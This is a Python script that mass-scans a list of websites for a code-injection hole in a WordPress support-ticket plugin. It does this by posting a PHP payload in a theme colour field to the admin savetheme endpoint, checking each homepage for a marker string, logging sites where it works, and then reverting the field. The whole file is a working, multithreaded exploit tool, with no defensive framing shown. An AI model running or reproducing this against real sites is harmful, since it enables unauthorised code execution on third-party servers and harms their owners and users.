wpjst.py

import requests
import base64
import sys
from concurrent.futures import ThreadPoolExecutor
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 2:
    sys.exit(f"Usage: python {sys.argv[0]} list.txt (thread)")

with open(sys.argv[1], "r") as f:
    sites = [line.strip() for line in f if line.strip()]

sites_with_index = list(enumerate(sites))


def exploit(args):
    site, i = args
    url = f"{site}/wp-admin/admin.php?page=themes&task=savetheme"

    data = {
        "color1": "#4f6df5",
        "color2": "#2b2b2b",
        "color3": "#f5f2f5",
        "color4": "#636363",
        "color5": "#d1d1d1",
        "color6": "#e7e7e7",
        "color7": "\".print('naxtarrr').\"",
        "form_request": "jssupportticket",
    }

    requests.post(url, data=data, verify=False, timeout=10)

    if "naxtarrr" in requests.get(site, verify=False, timeout=10).text:
        print(f"[+] EXPLOITABLE! -> {site}")

        with open("wpjst.txt", "a") as f:
            f.write(f"{site}\n")

        data["color7"] = "#e7e7e7"

        requests.post(url, data=data, verify=False, timeout=10)
    else:
        print(f"[-] Unexploitable -> {site}")


thread = sys.argv[2] if len(sys.argv) == 3 else 50
with ThreadPoolExecutor(max_workers=thread) as executor:
    for i, site in sites_with_index:
        executor.submit(exploit, (site, i))